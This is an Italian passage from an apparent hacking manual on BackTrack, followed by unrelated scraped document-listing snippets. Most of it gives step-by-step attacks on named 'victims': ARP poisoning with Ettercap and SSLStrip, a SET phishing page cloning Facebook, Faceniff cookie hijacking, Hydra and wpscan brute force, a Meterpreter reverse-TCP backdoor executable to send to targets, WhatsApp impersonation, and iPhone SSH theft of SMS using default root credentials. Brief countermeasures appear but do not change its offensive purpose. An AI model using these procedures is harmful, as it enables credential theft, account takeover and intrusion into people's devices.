69 sostanzialmente per ottenere l indirizzo ip dei dispositivi connessi. Per farla funzionare, basta eseguire questi comandi da terminale: nmap -sp -PT80 <Indirizzo ip di partenza-intervallo> Per esempio: nmap -sp -PT Cosi facendo si scansione l intera rete Se invece si vuole una ricerca delle porte aperte per host,basta digitare: nmap <indirizzo ip> Vedi immagine successiva Un altro programma davvero utile a riguardo a Kismet (http://www.kismetwireless.net/); questo software è creato appositamente per le reti Wifi e permette di ottenere molti dati a 69

70 riguardo. Per farlo partire basta digitare da terminale kismet e alla domanda Start Kismet Server, premere yes con il tasto invio. Oltre a Xplico, per visualizzare in chiaro le conversazioni presenti su Facebook, è possibile farlo con un programma non presente in Backtrack, ma disponibile su Internet. Per trovarlo basta digitare su google borogove.py. Una volta scaricato e copiato nella cartella root, basta aprire il terminale e digitare il seguente comando: python borogove.py <scheda di dire> <ip vittima> <ip rotuer> Per esempio python borogove.py wlan Ora le conversazioni, sarà visualizzate sulla schermata. 70

71 Quando si richiede di inserire l interfaccia di rete che si vuole utilizzare, basta digitare quella della periferica Wifi (basta digitare ancora un vola iwconfig da terminale per scoprire quale sia, per esempio wlan0) Dopo aver dato il comando di invio, il programma ricerca tutte le rete nelle circostanze, per una successiva intrusione. Per cui invece vuole effettuare una operazione simile ma non con Backtrack, può fare in questo modo. Quello che sta per essere illustrato, in teoria sarebbe potuto essere inserito nel capitolo precedentemente per la ricerca del bersaglio per craccare una rete Wifi, però è stato inserito in questo capitolo perchè è collegato all operazione di analisi di una rete, per capire ancora una volta come è composta un LAN e quindi agire di conseguenza. 71

72 Se si vuole creare una mappa di tutti le reti presenti nei propri comuni, il compito non è difficile. Ecco cosa si ha bisogno: Notebook con periferica Wifi e modulo Bluetooth Ricevitore GPS Bluetooh Un programma tra inssider 2 o Kismac Google Earth per visualizzare la loro posizione Dopo aver installato un programma tra inssider 2 (per Windows) o Kismac (per Mac os) si accende il ricevitore GPS e lo si collega al PC seguendo la semplice procedura di aggiunta di periferica bluetooth; una volta effettuato il collegamento si apre il programma di mappatura si seleziona il modulo e la sua porta com e si preme il tasto start. Adesso muniti di una macchina, effettuando un giro nella zona che si vuole descrivere sarà possibile schedare tutte le rete Wifi, sia protetta da password wpa2, wpa, wep, sia quelle libere, per avere una idee di dove è possibile connettersi ad internet, o anche solo per una curiosità statistica. Questo processo prende il nome di wardriving. 72

73 Ecco un esempio di scansione con inssider. Insomma per analizzare una rete c è davvero l imbarazzo della scelta. 73

74 74

75 Nei capitolo precedenti abbiamo visto come sia possibile entrare in una rete e avere una idea delle periferiche connesse ad essa. In questo capitolo verranno analizzate le tecniche per poter rubare le password, che vengono utilizzate nel LAN. Il primo programma che verrà illustrato è Ettercap (http://ettercap.sourceforge.net/) Questo programma è uno sniffer cioè intercetta i pacchetti presenti nella rete e li analizza. Innanzitutto, dal momento che la maggior parte dei protocolli utilizzati per accedere ad aree riservate è SSL, bisogna fare una piccola modifica al file di Ettercap. Per farlo basta cambiare alcuni linee di comando. Da terminale: nano /usr/local/etc/etter.conf e sostituiamo # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" in 75

76 if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_on = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" In poche parole dobbiamo togliere # dal file. Ora siamo pronti per aprire il programma, che può essere utilizzato sia in modalità grafica, che da terminale. Per avviarlo digitiamo da terminale: sudo ettercap -G Impostiamo il programma andando in Sniff-Unified sniffing, selezionando la periferica che utilizziamo per connetterci alla rete. Il passo successivo è quella di fare una scansione della rete. 76

77 Ora ci spostiamo nella tab Hosts e facciamo una scansione, per visualizzare le periferiche connesse alla rete. Dopo pochi secondi, saranno presenti tutti i dispositivi connessi alla LAN, con i relativi ip. 77

78 Ora selezioniamo l indirizzo del Router (di solito è quello che finisce con 1 come ip, nel nostro caso è ) e lo impostiamo come add to target 1, mentre il PC da attaccare, lo selezioniamo come Target 2. 78

79 Ora andiamo in Mitim, e selezioniamo ARP poisoning, per impostare il tipo di attacco (Man in the middle). Come ultima operazione facciamo parte l attacco, cliccando su Start-Sniff. Ora aspettiamo che la vittima inserisca i dati che ci servono e il gioco è fatto! Il nome utente e le password, verranno mostrate nella zona inferiore del programma. Anche questa operazione non è affatto complicato, ma risulta essere molto pericolosa in caso la vittima sia connessa ad una rete pubblica, dove le informazioni non sono protette. 79

80 Oltre a Ettercap esiste un altra applicazione, che si chiama SSLStrip che svolge lo stesso tipo di attacco (Man in the Middle), ma sfruttando un vero e proprio re-indirizzamento del traffico generato da un PC della vittima a quello dell attaccante. Ora vedremo in pratica cosa dovremo fare. Da terminale apriamo una nuova sessione e digitiamo sudo echo 1 > /proc/sys/net/ipv4/ip_forward (Questo serve per instradare i pacchetti), dove ip_forward è quello del nostro PC. sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

81 Questo serve per i pacchetti con cifratura, cioè quelli che sfruttano la porta 443 e 80. sudo arpspoof -i wlan0 ip_vittima ip_router Ovviamente wlan0 è la periferica da cui si sta facendo l attacco, mentre ip_vittima e ip_router vanno sostituiti con quelle che fanno al nostro caso. sslstrip -a -l w file.log -a registra il traffico cifrato e non che proviene e viene mandato al server -l specifica la porta su quale SSLStrip deve stare in ascolto -w specifica il file con estensione log dove viene salvato tutto l'output,nel nostro caso file.log Per visualizzare il documento file.log, essendo scritto nella stessa cartella in cui ci troviamo, basta digitare: cat file.log cat è il comando usato in Linux per visualizzare il testo di un file. Ora passeremo ad un programma più semplice da usare. Infatti parleremo di fake login, termine americano che significa accesso fasullo. Questo strumento ci permetterà di ottenere l accesso a molti account di posta elettronica,facebook etc... in modo davvero semplice. In poche parole attraverso un programma presente su un PC, simulando un sito simile all originale, la vittima inserirà nome utente e password, che verranno inoltre sul primo computer, mentre 81

82 la vittima continuerà a navigare sul sito nel quale ha inserito le credenziali di accesso. Ora passiamo alla pratica! Il programma da utilizza si chiama Set ed è presente in Backtrack. Per avvialo basta andare in Backtrack-Exploitation Tools-Social Engineering Tools-Social Engineering Toolkit-set. 82

83 Il programma si utilizza da terminale, ma risulta essere da verro semplice da utilizzare. Il passo successivo è quello di impostare l attacco. Per prima cosa si seleziona 1 e si preme invio. Con questa scelta abbiamo indicato di utilizzare un SocialEngineering Attacksg. In seguito digitiamo 3 e invio per selezionare Credential Harvester attack Method, Nella parte in altro del 83

84 terminale, ci viene mostrata una descrizione dei tipi di attacco da utilizzare, per imparare tutte le possibili mosse, per avere piena conoscenza di quello che si sta facendo. Il passo successivo e quello di digitare 1 e premere invio, per utilizzare un Web Templates già presente in Backtrack; tuttavia possibile copiare il contenuto di un sito, digitando invece 2 (site cloner) e scrivere il nome del sito, per esempio facebook.cok. Una volta fatto ciò, selezioniamo il tipo di sito per cui si vuole rubare le credenziali di accesso. Nel nostro caso faremo 4 e invio. 84

85 Ora è stato correttamente impostato il programma set. Il passo successivo è quello di conoscere il l indirizzo ip della macchina da cui si sta facendo l attacco; per scoprirlo facciamo iwconfig e troveremo la nostra riposta. Ora basta indurre la vittima ad aprire un link, contente l indirizzo ip, mascherandolo magari con un codice html o uno shortlink e il pc sotto attacco mostrerà sul monitor un sito totalmente identico a quello che la vittima pensa di essere collegata, la quale inserirà nome utente e password e il gioco è 85

86 fatto! Infatti ora avremo sulla schermata del nostro terminale tutti i codice che ci servono per poter aver accesso all account che ci interessa! In gioco da ragazzi! Questo attacco è stato illustrato per poter essere utilizzato dove la vittima si trovi nella stessa rete locale. Tuttavia è possibile farlo anche da remoto, impostando correttamente il PC attaccante, in modo tale da poter essere raggiunto fuori dal LAN; impostando le porte 80 e 443 del nostro router ( il termine di questa operazione è port forwarding) Questa applicazione ha tantissime funzionalità, che vedremo nei prossimi capitoli. 86

87 Se anche questa procedura di fake login dovesse essere complicata, ma non lo è davvero, c è una soluzione davvero spaventoso a causa della facilità con cui sia possibile entrare in account di Facebook. Questa applicazione è disponibile solo per cellulare Android, è si chiama Faceniff (http://faceniff.ponury.net/). Essa funziona solo su cellulari rooted cioè con i privilegi massimi per cellulari. Per farlo basta fare una ricerca su google del programma SuperOneClick.exe. L applicazione funziona su qualsiasi tipo di rete Wifi, libera o con protezione. Una volta scaricata (è disponibile l applicazione lite e quella al prezzo di 4 $), basta pigiare sul tasto start e tutti gli account di persone connesse nella stessa rete (WLAN), verranno rubati e si potrà avere accesso a tantissimi servizi. Ecco quelli supportati: 87 FaceBook

88 Twitter Youtube Amazon VKontakte Tumblr MySpace Tuenti MeinVZ/StudiVZ blogger Nasza-Klasa In basso si vedranno gli account rubati e per visualizzare la parte riservata, basta cliccare. Risulta fin troppo semplice questa operazione! 88

89 Questo meccanismo funziona alla perfezione negli Hotspot pubblici, dove le informazioni non sono sicure e pertanto è possibile acquisire tantissime informazioni (messaggi privati e tanto altro) in maniera semplice. Questo programma sfrutta il fatto che le sessioni di facebook, lasciano dei cookies cioè dei pacchetti che permettono di accedere più velocemente ad un sito già visionato. Copiando questi file testo, per il server di facebook, risulterà 89

90 accettabile la richiesta di Faceniff per poter visualizzare un account di Facebook, con gli stessi cookies e con lo stesso ip pubblico. Tutte le procedure precedenti funzionano con qualsiasi tipo di password; non cambia se essa è *! &/// Il prossima programma, invece, sfrutta un attacco bruteforce per ottenere accesso, per esempio, alla pagine di controllo del router, di cui non si conosce nome utente e password. Il programma di chiama Hydra. Essa è disponibile sia da terminale, che in formato grafico. Dopo aver aperto l applicazione Hydra avremo una schermata di questo tipo. Nella prima tab, dovremo indicare l indirizzo ip del router da attaccare (di solito è ), selezionando il tipo di attacco (http-get) e nella tab successiva, passwords, indichiamo dove si trova il dizionario (che abbiamo scaricato da google). Dopo aver finito di impostarlo, basta andare nell ultima tab, facendo partire l attacco bruteforce. Il tempo impiegato varia da pochi secondi a ore o all infinito se la password non è contenuta nel dizionario. 90

91 Questa tecnica si utilizza, se la password è stata modificata rispetto a quella di default. In caso contrario, basta sapere il modello del router ed è possibile risalire alle credenziali d accesso in pochi secondi. Per avere una lista basta andare all indirizzo digitando la marca del modello del Router (vedi programma autoscan) 91

92 Tutte le procedure elencate, funzionano in qualsiasi tipo di rete, specialmente quelle senza fili, dove non si è costretti ad essere vicini al router, ma anche in una zona nascosta, per poter effettuare un attacco senza essere scoperti. Funzionano ancora di più negli Hotspot Wifi, dove molte persone accedono ad aree riservate con password, che sono facili da rubare (vedi i vari programmi elencati precedentemente) Contromisure Ecco una serie di contromisure per evitare blindare le passowrd: 1. Proteggere la propria rete Wifi, come è stato detto nel capitolo 3 2. Utilizzare il più possibile il cavo di rete per connettersi ad 92

93 Internet 3. Navigare su siti https, cioè cittografati 4. Usare se possibile una VPN (Virtual Private Network) evitando così intercettazioni di pacchetti da remoto 5. Disconnettersi ogni volta che si ha finito di navigare su una pagina protetta 6. Evitare di accedere a portali di accesso in Hotspot Wifi Inolte per Facebook è possibile attivare una ulteriore protezione; eccola. Molti non sanno che Facebook non sfrutta il protocollo sicuro SSL (Secure Sockets Layer) a 128 bit, ma utilizza la normale porta 80 per connettersi al noto social network. Per dir la verità non è chiaro perchè non venga adottato di serie nei profili degli utenti. 93

94 In ogni caso è possibile attivare questa funzionalità nella sezione impostazioni account -protezione-navigazione protetta e bisogna attivarla. In questo modo è possibile navigare in sicurezza sul noto social network, in modo che il traffico non venga intercettato da possibili cracker, specialmente in posti pubblici (vedi hotspost wifi). In ogni caso conviene controllare che il sito in cui navighi sia https://www.facebook.com 94

95 95

96 Nel capitolo 4, ho parlato più di una volta dell importanza delle porte di comunicazione aperte su un determinato PC connesso ad una rete locale; In questo capitolo capirete il motivo di questa sottolineatura. Il primo programma che vedremo si chiama Fasttrack, raggiungibile andando in Backtrack-Exploitation ToolsNetwork Exploitation Tools-Fast-track-fasttrack ineractive. Ora digitiamo 2, per selezionare Autopwn Automation 96

97 Qui abbiamo varie opzioni. Se abbiamo un unico bersaglio, basta digitare il suo indirizzo ip di rete, seguito dal comando invio 97

98 Ora abbiamo due possibili scelti, bind e reserve. Queste due configurazioni, stanno ad indicare semplicemente, se abbiamo intenzione di collegarci noi direttamente al pc della vittima ( bind ) o fare l opposto, cioè fare in modo che sia lui che si connetta al nostro dispositivo. bind= connessione diretta al server (pc della vittima) reverse= connessione che viene generata direttamente dall altro server. Dopo qualche minuto, se l attacco avrà avuto esito positivo, si potrà accedere direttamente dal terminale nel pc della vittima. 98

99 Backdoor Se questo attacco non fosse riuscito, è possibile eseguirne uno simile attraverso un paylod all interno di un comunissimo file con estensione.exe. Per farlo apriamo da ci spostiamo nella cartella dove è presente il programma set. L opzione da digitare è 1 per selezionare un attacco di ingegneria sociale 99

100 L opzione da digitare è la 4, per selezionare create a Payload and Listener. 100

101 Successivamente si digita il comando 2, per selezionare un attacco di tipo WindwosReverse_TCP terpreter. Il termine TCP, sta ad indicare che è un tipo ti porta che serve per comunicare, cioè inviare i dati (ecco perchè le porte all interno di una rete svolgono un ruolo importante in un attacco di rete). 101

102 Ora creiamo un Backdoor, cioè un file che permette di eludere le protezioni presenti in un PC. Digitiamo 16, seguito dalla porta nella quale siamo in ascolto (443). 102

103 Dopo pochi instanti incomincerà a generare il file, che permetterà di aprire le porta del PC attaccato. 103

104 Ora il file con estensione è stato generato e si trova nella cartella pentest/exploits. Il nome del file è msf.exe. Ora il compito è quello di trasferire questo file nel pc della vittima, attraverso vari modi; per esempio fisicamente attraverso una pen drive o per posta elettronica (non con GMAIL perchè blocca l invio di file.exe, per motivi di sicurezza!). Una volta che questo file viene avviato dal PC della vittima, siamo davvero vicino al nostro obiettivo. Ora ci spostiamo nella cartella dove si trova l eseguibile./msfconsole digitando da terminale 104

105 cd /opt/framework/msf3./msfconsole Ora digitiamo: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp 105

106 Ora selezioniamo l indirizzo ip della vittima, digitando semplicemente: set lhost indirizzo_ip_della_vittima 106

107 Ora selezioniamo la porta che abbiamo indicato nella fase precedente: set lport

108 Ora diamo il comando exploit per fare partire l ultimo attacco. Ora siamo dentro al pc! Sarà possibile avere una schermata e utilizzare il terminale della vittima. 108

109 109

110 Forse l aspetto più interessante e affascinante di Internet, che esso stesso è una grande rete locale. In sostanza il ruolo dei registri, usando un termine calcistico, viene fatto dai router. Essi hanno il ruolo di far visitare una particolare pagina web richiesta da un pc interno alla rete locale, con più dispositivi. Perciò il router ha il ruolo di NAT, ovvero smista il traffico proveniente dall esterno WAN verso l interno e viceversa. Quindi si è solito assegnare ip privati del tipo x.x, mentre quelli esterni, per esempio di un sito internet possono essere molto vari. Lo stesso router, che internamente viene raggiunto attraverso l ip, per esempio, , all esterno viene raggiunto attraverso un ip totalmente diverso. Ma come si può ottenere un ip remoto di una persona? Questa domanda sembra abbastanza importante, se si pensa a gli attacchi informatici che quotidianamente affliggono vari pc. Nel caso volessimo conoscere l ip pubblico della nostra connessione, basta semplicemente digitare su google my ip e si apre uno dei primi risultati e si otterrà il codice. 110

111 Ovviamente il codice comparirà totalmente, non come l immagine soprastante, oscurata per motivi di privacy. Ma se invece volessimo sapere l ip di un nostro amico? La cosa si complica leggermente, ma non troppo. La situazione diventa semplice se quest ultimo ha mandato un a noi. In questo caso, sarà possibile ricavare l ip. In altri casi, occorrerà trovare qualche modo, affinché risponda ad un nostro messaggio di posta elettronica. Come primo passo, occorre aprire l in questione e cercare la voce mostra sorgente, che si trova in quasi tutte le webmail. Una 111

112 volta copiato il testo, occorre incollarlo in questo sito: Una volta completata la procedura, basterà premere il comando trace sender. Ora comparirà la localizzazione geografica dell ip in questione. Ora sarà possibile trovare eventuale falle nel sistema, come porte aperte, oppure modificare il firmware del router, in modo da instradare il traffico verso un nostro server, per visualizzare alcune informazioni. 112

113 Un interessante articolo tratto dal blog oversecurity, informa di una grave falla che permette, appunto, di reindirizzare il traffico di un utente Alice, su un server esterno. Una nuova ed imponente vulnerabilità affligge i router di Telecom Italia, marchiati Alice Gate AGPF, a scoprire la nuova falla è stato Emilio Pinna del team BackBox. La vulnerabilità permette ad un utente malintenzionato di acquisire il pieno controllo del router in maniera permanente con gravi conseguenza sulla privacy dell utente, una volta acquisito l accesso al router l attaccante potrà: Intercettare i siti visitati dall utente e redirezione verso siti copia fasulli per rubare credenziali di mail, social network, home banking, etc modificando i record del DNS; Ascoltare le chiamate telefoniche, telefoni analogici compresi, sostituendo l indirizzo del server VoIP ufficiale con quello di uno preparato per le intercettazioni; Instradare tutto il traffico verso una macchina dell attaccante allo scopo di analizzare il traffico e sottrarre dati sensibili; Aprire dei pannelli di controllo del router verso internet con il quale l attaccante mantiene l accesso remoto al router nel tempo, con una interfaccia web esposta verso internet e tracciata via dns dinamico. Secondo una prima stima approssimativa sui 9 milioni di clienti di Telecom Italia il 25% è in possesso del modem vulnerabile, circa 2 113

114 milioni di clienti sono vulnerabili all attacco mettendo gravemente a rischio la privacy degli utenti. È possibile ottenere il pieno controllo del router grazie alla presenza di due vulnerabilità nel software che opportunamente sfruttate in conseguenza danno accesso ai parametri interni, in primis il parametro HTTPstack_set della pagina admin.cgi dell interfaccia web permette di riscrivere qualsiasi parte della configurazione interna del router (vulnerabilità comunemente sfruttata dal legittimo proprietario del router per sbloccare funzionalità nascoste). Inoltre il router di Alice non offre nessuna protezione contro gli attacchi CSRF: pubblicando una semplice pagina appositamente preparata si può forzare il browser dell utente che la visita ad effettuare una richiesta HTTP post verso l interfaccia web del router. In pratica per sferrare l attacco è necessario effettuare una particolare richiesta HTTP all URLhttp:// /admin.cgi con la quale è possibile riscrivere completamente la configurazione interna del router, ipotizzando un attacco su larga scala un utente malintenzionato potrebbe pubblicare una porzione di codice HTML in una pagina internet molto trafficata e in poche ore trovarsi una botnet di Router a propria disposizione. Emilio ha reso disponibile una pagina per verificare 114

115 autonomamente se il proprio router Alice ADSL è vulnerabile, inoltre per chi volesse approfondire gli aspetti tecnici è disponibile la Full Disclosure. 115

116 116

117 Wordpress è una delle soluzioni per creare siti internet anche professionali, più conosciuta negli ultimi anni. Grazie alla sua facilità di utilizzo e di gestione, ha avuto un grosso successo tra i vari bloggers di questo mondo. In questo capitolo vedremo come è possibile eludere la sicurezza di questo servizio, utilizzando un programma che si chiama Digitiamo da terminale per aprire il programma wpscan; cd /pentest/web/wpscan L operazione successiva è quella di scrivere: ruby./wpscan.rb --url wordpress dove al posto di wordpress scriviamo il sito nel quale vogliamo entrare 117

118 ruby./wpscan.rb --url wordpress --enumerate p ruby./wpscan.rb --url 1wordpress --enumerate u Questi ultimi due comandi, servono essenzialmente per conoscere tutte le possibilità vulnerabilità che sono presenti in questo database. Una volta finito di eseguire l operazione da terminale, si avrà un elenco delle possibili falle, che possono essere utilizzate per un eventuale attacco. Il passo successivo dipende da quello precedente, poichè per ogni falla c è un operazione da fare. Il generale è possibile effettuare un attacco brutefoce, utilizzando un dizionario che è possibile reperire da internet. Per farlo basta digitare: ruby./wpscan.rb --url wordpress --wordlist *your file* --username *user account* dove al posto di your file bisogna inserire l indirizzo dove è presente il dizionario. 118

119 119

120 WhatsApp è uno dei più famosi servizi che permette di inviare messaggi gratuiti tra gli utenti mobile, attraverso una semplice connessione ad Internet. Non occorre neanche effettuare una registrazione, poiché vengono sfruttate, come credenziali, il numero di cellulare. Sebbene a prima vista, questa soluzione sembra comoda, in realtà è alla base di un importante falla di sicurezza del servizio. La password che viene generata, non è così casuale come sembra. Infatti essa si calcola attraverso un reverse, semplicemente conoscendo il mac address WiFi del proprio cellulare, oppure direttamente il codice IMEI. Quindi, se uno riuscisse a conoscere il l indirizzo fisico della scheda di rete, è possibile far credere ai server di WhatsApp, di essere un altra persona e quindi leggere e scrivere messaggi. Ecco come si svolge nella pratica un possibile attacco di questo tipo. Facciamo il caso, per capire meglio i vari passaggi, che il numero di cellulare sia (un numero a caso) e l indirizzo della scheda WiFi dell iphone della vittima sia AA:BB:CC:DD:EE:FF. Come si può ottenere questo codice? In realtà è molto semplice, occorrono semplici programmi di scansioni delle reti, quali NMAP e Autoscan. Da quest ultimo, basta vedere i dispositivi Apple presenti, per esempio in un Hotspot pubblico e si copia il codice da qualche parte. Ora facciamo il reverse dal mac address per ottenere il codice MD5. Usiamo per esempio questo sito online, che permette il 120

121 calcolo velocemente. Ora per testare la vulnerabilità, basta aprire un browser con questo link https://r.whatsapp.net/v1/exist.php? cc=$countrycode&in=$phonenumber&udid=$password Dove al posto di countrycode occorre inserire 39, senza + oppure 00, phonenumber è il numero telefonico, e password è quella che abbiamo ottenuto attraverso la generazione del MD5. Se tutto è andato bebe, troveremo una schermata simile a questa, con la dicitura ok. 121

122 Notate immediatamente che l esito dello stato è OK il che conferma che avete ottenuto l accesso al vostro account, se invece la password generata o l utente non è riconosciuto dal servizio di messaggistica apparirà la dicitura FAIL. Con la stessa identica metodologia, invio di variabili GET su PHP, possiamo inviare messaggi ad utenti WhatsApp o verificare se ci sono messaggi non letti. Per automatizzare la procedura ci viene in soccorso uno script denominato WhatsAPI, che ha seguito di direttive da parte della stessa società di messaggistica istantanea non è più disponibile sul circuito GitHub, ma comunque attraverso file hosting ( occorre cercare su google ) WhatsAPI ci permette quindi di testare la sicurezza di WhatsApp rendendo possibile l invio di messaggi e la relativa ricezione attraverso il nostro PC anziché sullo Smartphone, lo script è di estremo utilizzo e richiede l installazione di PHP sulla nostra distribuzione. Terminato il download di WhatsAPI estraiamo il contenuto e dirigiamoci nella cartella test in essa troveremo un unico file denominato whatsapp.php. Apriamolo con editor di testo ed 122

123 inseriamo i dati, che abbiamo ottenuto nei passaggi precedenti, in queste righe: $nickname = WhatsAPI Test ; $sender = ; // Mobile number with country code (but without + or 00) $imei = AA:BB:CC:DD:EE:FF ; // MAC Address for ios IMEI for other platform (Android/etc) Ora salviamo il file e apriamo da terminale il programmino digitando: $ php whatsapp.php Dopo aver digitato, si aprirà l help di questo programma, per capire come usarlo. Noi, abbiamo varie possibilità: leggere gli sms della vittima, oppure inviarne uno, come se fossimo la vittima! Ovviamente è illegale tutto ciò, ma come potete vedere è davvero semplice e non richiede troppe skill. Digitiamo da terminale per leggere i messaggi 123

124 php whatsapp.php -i Ecco alcune screenshot tratte da oversecurity Se invece voglia inviare messaggio ad un atra persona, come se fossimo la vittima occorre digitare: php whatsapp.php -s numero di cellulare ricevente testo del messaggio 124

125 In conclusione WhatsApp è vulnerabile, qualsiasi persona può sostituirci in una conversazione conoscendo esclusivamente il nostro codice IMEI. Si possono inviare e ricevere risposte senza che il destinatario si accorga di nulla e ancor più gravoso neanche il mittente (utente vulnerabile) avrà la ben cheminima traccia di quanto accaduto, nella sua cronologia di chat non solo non appariranno i messaggi inviati ma neanche quelli in risposta. 125

126 126

127 127

128 SMS e dati personali sott attacco! L iphone è diventato il cellulare più venduto e usato al mondo, grazie alla sua semplicità d utilizzo, alle sue funzionalità e alla sua alta sicurezza ( o quasi ). A causa, però, delle rigide imposizioni da parte di Apple sulle applicazioni presenti su AppStore, nel corso degli anni è nato un nuovo store che si chiama Cydia. Qui è possibile trovare tweak e applicazioni che aggiungono nuove funzionalità al dispositivo. L unica difficoltà per avere queste features è lo sblocco del terminale. Tuttavia, seguendo le procedure disponibili su Internet, è possibile effettuare lo sblocco con pochi click. Tra i tweak presenti, è possibile trovare Open SSH, che permette di utilizzare tale protocollo, per trasferire facilmente grossi file, senza utilizzare itunes. Il problema principale di questa estensione è che durante la fase d installazione, non è possibile cambiare le credenziali d accesso all iphone, ma rimangono quelle di default. Solo successivamente, su volontà dell utente è possibile modificarle. Il pirata, dopo aver individuato se il dispositivo è vulnerabile, accede all iphone con la password di default e copia i database contenenti sms, contatti e immagini. Poi li apre con un programmino ed è in grado di leggere praticamente tutto! Per fortuna è possibile rimediare a questo problema, cambiando le credenziali d accesso. Le screenshot si riferiscono a programmi Windows, ma che sono sempre disponibili in Linux e Backtrack. Come prima operazione, il pirata utilizza un programma per trovare le periferiche connesse ad una rete WiFi pubblica. Il software si 128

129 chiama NMAP ed è possibile scaricarlo da questo link. Questo programma fa una scansione della rete WiFi a cui si è connessi e mostra la marca delle periferiche connesse. Ora il malintenzionato apre il programma e fa partire la scansione, premendo il comando scan. Ora gli basta aspettare qualche istante e troverà tutte le periferiche connesse alla rete. Si annota gli indirizzi ip e li inserisce nella voce target per individuare l'iphone. Questo tipo d'attacco funziona anche se l'iphone è connesso ad Internet con il 3G. In questo caso, il pirata, cercherà di ricevere un' dalla vittima e copierà il sorgente del messaggio e lo incolla in questo sito. Dopo pochi instante troverò l'indirizzo ip. 129

130 Ora che l'hacker conosce l'indirizzo ip, prova a vedere se è attivo il servizio SSH sull'iphone, semplicemente usando sempre il programma NMAP, dopo aver digitato l'indirizzo ip dell'iphone sotto la voce target. Se la porta 22 è aperta, allora l'attacco è possibile farlo. In caso contrario, cercherà un'altra vittima. Il pirata, dopo aver individuato l'indirizzo ip della vittima e verificato la vulnerabilità, utilizza un programma per accedere in SSH al dispositivo, come ad esempio CyberDuck e aggiunge il dispositivo, attraverso il pulsante nuova connessione. Il nome utente e la password sono root e alpine. Ora può vedere tutti i dati della vittima! 130

131 All'interno dell'iphone è possibile trovare tante cartelle; il pirata sa quale sono le più importanti. Ecco quali: SMS /private/var/mobile/library/sms Notes backup /private/var/mobile/library/notes Call History backup /private/var/mobile/library/callhistory Voic backup /private/var/mobile/library/voic Voic s are stored as 1.amr, 2.amr, within this directory. The 131

132 custom greeting is stored as Greeting.amr Contacts/Address Book backup /private/var/mobile/library/addressbook/ Mail backup /private/var/mobile/library/mail Pictures and Video Recordings /private/var/mobile/media/dcim/ Calendar backup /private/var/mobile/library/calendar/ 132

133 Ora che il pirata ha copiato, per esempio il file sms.db, apre il programma SQL e seleziona il file appena copiato. Ora potrà vedere in chiaro i messaggi della vittima. Un gioco da ragazzi per lui! Come detto precedentemente l'attacco funziona solo se l'iphone ha attivo il servizio SSH e la sua passoword non è stata modificata. Per cambiare le credenziali d'accesso, occorre aprire il terminale 133

134 dall'iphone e digitare passwd e digitare la nuova parola. Ora saremo sicuri da eventuali attacchi di questo tipo. Come potete vedere, è facile leggere gli SMS di una persona, sfruttando le sue disattenzione. Per altri attacchi di questo tipo, è disponibile una sezione in Backtrack 5 R3, sotto la voce Smartphone-Pentest-Framework. 134

CHIAVETTA INTERNET ONDA MT503HSA

CHIAVETTA INTERNET ONDA MT503HSA CHIAVETTA INTERNET ONDA MT503HSA Manuale Utente Linux Debian, Fedora, Ubuntu www.ondacommunication.com Chiavet ta Internet MT503HSA Guida rapida sistema operativo LINUX V 1.1 33080, Roveredo in Piano (PN)

Dettagli

Manuale di configurazione per iphone

Manuale di configurazione per iphone Manuale di configurazione per iphone Notariato.it e.net (Iphone 2G e 3G) 2 PREMESSA Il presente manuale ha lo scopo di fornire le indicazioni per la configurazione del terminale IPhone 2G e 3G per ricevere

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

Progettare network AirPort con Utility AirPort. Mac OS X v10.5 + Windows

Progettare network AirPort con Utility AirPort. Mac OS X v10.5 + Windows Progettare network AirPort con Utility AirPort Mac OS X v10.5 + Windows 1 Indice Capitolo 1 3 Introduzione a AirPort 5 Configurare un dispositivo wireless Apple per l accesso a Internet tramite Utility

Dettagli

Schema Tipologia a Stella

Schema Tipologia a Stella Cos'e' esattamente una rete! Una LAN (Local Area Network) è un insieme di dispositivi informatici collegati fra loro, che utilizzano un linguaggio che consente a ciascuno di essi di scambiare informazioni.

Dettagli

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 (marzo 2009) ultimo aggiornamento aprile 2009 Easy Peasy è una distribuzione

Dettagli

Guida alla configurazione della posta elettronica. bassanonet.com

Guida alla configurazione della posta elettronica. bassanonet.com Guida alla configurazione della posta elettronica bassanonet.com 02 Guida alla configurazione della posta elettronica I programmi di posta elettronica consentono di gestire una o più caselle e-mail in

Dettagli

Come installare e configurare il software FileZilla

Come installare e configurare il software FileZilla Come utilizzare FileZilla per accedere ad un server FTP Con questo tutorial verrà mostrato come installare, configurare il software e accedere ad un server FTP, come ad esempio quello dedicato ai siti

Dettagli

COPERTURA WI-FI (aree chiamate HOT SPOT)

COPERTURA WI-FI (aree chiamate HOT SPOT) Wi-Fi Amantea Il Comune di Amantea offre a cittadini e turisti la connessione gratuita tramite tecnologia wi-fi. Il progetto inserisce Amantea nella rete wi-fi Guglielmo ( www.guglielmo.biz), già attivo

Dettagli

Guida all utilizzo del dispositivo USB

Guida all utilizzo del dispositivo USB Guida all utilizzo del dispositivo USB 30/04/2013 Sommario - Limitazioni di responsabilità e uso del manuale... 3 1. Glossario... 3 2. Guida all utilizzo del dispositivo USB... 4 2.1 Funzionamento del

Dettagli

Virtualizzazione e installazione Linux

